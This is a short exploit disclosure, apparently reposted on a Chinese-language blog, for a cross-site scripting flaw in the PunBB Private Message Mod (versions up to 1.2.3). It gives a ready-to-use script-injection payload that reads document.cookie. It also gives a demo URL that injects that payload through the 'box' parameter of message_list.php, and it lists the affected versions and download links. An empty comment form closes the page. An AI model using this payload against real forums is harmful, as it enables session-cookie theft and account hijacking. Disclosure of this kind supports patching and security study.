PunBB私人消息系统<= 1.2.3 XSS 漏洞

[+] Discovered By: The_Exploited

@Title: PunBB Private Message Mod <= 1.2.3 XSS Vulnerability (5)

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: WwW.SecuritySpl0its.CoM

@Exploit: "><script>alert(document.cookie)</script>

@Demo: http://mysite.com/punbb/message_list.php?action=multidelete&box="><script>alert(document.cookie)</script>

@Mod Version: <= 1.2.3

@CMS Version: <= 1.2.15

@Mod Download: http://www.punres.org/files.php?pid=52

@CMS Download: http://punbb.informer.com/download/museum/

发表评论?

0 条评论。

发表评论